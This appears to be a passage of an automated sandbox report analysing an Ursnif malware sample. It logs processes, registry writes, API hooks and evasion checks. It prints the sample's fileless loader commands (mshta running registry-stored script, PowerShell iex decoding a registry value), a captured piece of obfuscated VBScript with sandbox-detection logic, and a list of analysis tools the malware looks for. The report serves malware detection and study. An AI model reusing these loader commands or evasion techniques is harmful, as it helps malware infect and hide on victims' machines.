Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline' Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: v8MaHZpVOY2L.vbs Static file information: File size 2145907 > 1048576
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.pdbXP@L source: powershell.exe, 00000025.00000002.750257715.000001D6861CE000.00000004.00000001.sdmp
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000027.00000002.731260483.0000015F83160000.00000002.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.pdb8 source: powershell.exe, 00000025.00000002.750151124.000001D68618E000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kf2dbsxa\kf2dbsxa.pdb source: powershell.exe, 00000025.00000002.744104497.000001D6848CF000.00000004.00000001.sdmp
Source: Binary string: c:\Did\off\flow-Shoulder\Son\Record.pdb source: wscript.exe, 00000002.00000003.406245520.00000294B943D000.00000004.00000001.sdmp, rundll32.exe, 0000001C.00000002.736255174.0000000070329000.00000002.00020000.sdmp, beneficial.odt.2.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kf2dbsxa\kf2dbsxa.pdbXP@L source: powershell.exe, 00000025.00000002.744104497.000001D6848CF000.00000004.00000001.sdmp

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell")Rastus = redden.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\" + "30226" + ".txt"If WScript.CreateObject("Scripting.FileSystemObject").FileExists(Rastus) ThenJason = (258 - ((954 - 688.0) - (51 + (-43.0))))ElseREM export Schwartz pellet Josephus prophesy probabilist Medford transcript Indoeuropean, 6902325 midwives bazaar origin faceplate oersted dividend monologue furthermore Westminster, 2587295 gyrocompass capstone Jason = (((39 + 29.0) + (46 + 282.0)) - 395.0)End Ifforborne = JasonREM guarantee Paraguayan strand, fogy reap Zeiss broad penal provision sociometry Fresno remembrance condolence Philistine41 wall status dock End FunctionFunction minus()GxzLW("DEBUG: FS_FCC - Start")' octave rhododendron intuition. sac pediment. tail telescopic syringe aggravate wallet Lyon too on error resume next' Atlantis boulder phrasemake feed wardrobe. schlieren trainman maldistribute hindsight pentecostal Bodleian bedroom Nippon stoppage deflect, Set wdhWF = GetObject("winmgmts:\\.\root\cimv2")Set MDQ = wdhWF.ExecQuery("Select * from Win32_Processor", , (607 - (567 - ((88 + (-13.0)) + (-67.0)))))For Each giantess In MDQIf giantess.NumberOfCores < (((68 + 1.0) - 14.0) + (-(4146 - 4094.0))) Thenfossiliferous = TrueREM trouser Indiana whee, cotman knockout screenful Marriott Miles Rothschild lingual southpaw sportswriting torque. Lebesgue imperate decree Israelite duress megabyte GxzLW("DEBUG: FS_FCC - False")End IfREM rangy share humpty z conundrum. binocular Howell Worcestershire inferno ionosphere inferno370 phi mobcap corrigible downwind expression NextIf fossiliferous ThenOSWmEnd IfREM gestation average poverty saturater met longue. Pericles eohippus Aug impose, desist demurring stream594 withheld expound Eastman GxzLW("DEBUG: FS_FCC - True")REM Doherty Goodman wart smug oppressive, paraboloid stifle assiduous gummy. material quest revelry End FunctionFunction guerrilla()GxzLW("DEBUG: FS_CM - Start")on error resume next' bug famish batik antennae afforest112 cherubim browbeaten pidgin Fujitsu midband. barbarism jot Harbin sod Dim qjbJl,sturgeonqjbJl=6000sturgeon=3000RandomizeWScript.Sleep Int((qjbJl-sturgeon+1)*Rnd+sturgeon)Set wdhWF = GetObject("winmgmts:\\.\root\cimv2")Set MDQ = wdhWF.ExecQuery("Select * from Win32_ComputerSystem")' none slice cowpox summertime camelback testicular ogle lumen, marketplace grail caramel believe For Each giantess In MDQFOC = FOC + Int((giantess.TotalPhysicalMemory) / (1048865 - ((3614 - 2.0) - (3356 - 33.0))))NextIf FOC < (98 + ((1314 - (73 + 252.0)) - 57.0)) ThenGxzLW("DEBUG: FS_CM - False")REM Sousa Peloponnese curmudgeon joke Benson Auckland desideratum draw Cornwall ghastly gavotte, invidious, direct OSWmEnd IfGxzLW("DEBUG: FS_CM - True")End FunctionFunction gGXl()REM hat runt ultimatum physician maul. slang parliament Albert pyridine. 5714460 postoperative libertine scholastic nothing421 plethora Mycenaean flunk peaceable oriental GxzLW("DEBUG: FS_TD1 - Start")GxzLW("DEBUG: FS_TD2 - Start"
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline' Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E1D62 LoadLibraryA,GetProcAddress, 28_2_702E1D62
PE file contains an invalid checksum
Source: beneficial.odt.2.dr Static PE information: real checksum: 0xadda3 should be: 0xa6e2d
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E2210 push ecx; ret 28_2_702E2219
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E2263 push ecx; ret 28_2_702E2273
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04447E1F push ecx; ret 28_2_04447E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04447AB0 push ecx; ret 28_2_04447AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_0444B1DE push esp; iretd 28_2_0444B26C

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\beneficial.odt Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\beneficial.odt Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\v8mahzpvoy2l.vbs Jump to behavior
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Stores large binary data to the registry
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Key value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 UtilDate Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXEHK
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: IDAG.EXEXU
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
